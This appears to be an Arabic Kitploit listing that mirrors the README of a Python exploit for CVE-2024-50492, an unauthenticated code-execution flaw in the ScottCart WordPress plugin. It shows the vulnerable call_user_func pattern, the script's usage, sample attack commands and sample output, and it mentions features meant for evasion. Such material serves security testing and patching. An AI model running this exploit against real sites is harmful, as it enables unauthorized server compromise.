Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-50492
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2024-50492 - استغلال RCE في ScottCart <= 1.1

🔥 سكربت استغلال لـ ScottCart <= 1.1 - تنفيذ أكواد عن بُعد بدون مصادقة
🧑‍💻 بواسطة Nxploit – Khaled Alenazi


📌 الوصف

إضافة ScottCart لـ WordPress (الإصدارات ≤ 1.1) معرضة لثغرة تنفيذ الأكواد عن بُعد (RCE).
وهذا يسمح للمهاجمين غير المصادَقين بتنفيذ دوال PHP عشوائية على الخادم عبر نقطة نهاية AJAX ضعيفة.

  • الإضافة: ScottCart ≤ 1.1
  • الثغرة: حقن دوال بدون مصادقة → RCE
  • CVE: CVE-2024-50492
  • درجة CVSS: 9.8 - حرجة

🧠 كيف يعمل

يسجّل الإضافة إجراء AJAX غير محمي:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

والذي ينفّذ:

root@kitploit:~
call_user_func($_POST['function']);

مما يسمح للمهاجمين باستدعاء أي دالة PHP موجودة، مثل:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← إذا تم توسيعها في بيئات معدّلة

🚀 ميزات الاستغلال

  • ✅ يرسل تلقائيًا حمولة مصمّمة لاستهداف نقطة النهاية الضعيفة
  • ✅ يسمح بتجاوز الدالة عبر وسيط
  • ✅ الحمولة الافتراضية: phpinfo() لإثبات المفهوم PoC
  • ✅ يحفظ المخرجات في ملف بختم زمني (مثل: results_2025-03-26_14-33-01.txt)
  • ✅ User-Agent مخصص، ومعالجة أخطاء، وتجاهل SSL للتمويه

🖥️ الاستخدام

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Function to call (default: phpinfo)

💡 أمثلة

🔍 السلوك الافتراضي (إثبات المفهوم مع phpinfo()):

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 استدعاء دالة داخلية في الإضافة:

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 مثال على المخرجات

root@kitploit:~
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:

PHP Version => 8.1.12
...

📁 ويُحفظ في: results_2025-03-26_14-33-01.txt


🛡️ إخلاء مسؤولية

هذه الأداة مخصّصة لأغراض التعليم والاختبار المصرّح به فقط.
لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


💬 الاعتمادات

  • 💻 الاستغلال بواسطة: Nxploit – Khaled Alenazi
  • 🛡️ معرّف CVE: CVE-2024-50492
تنزيل الأداة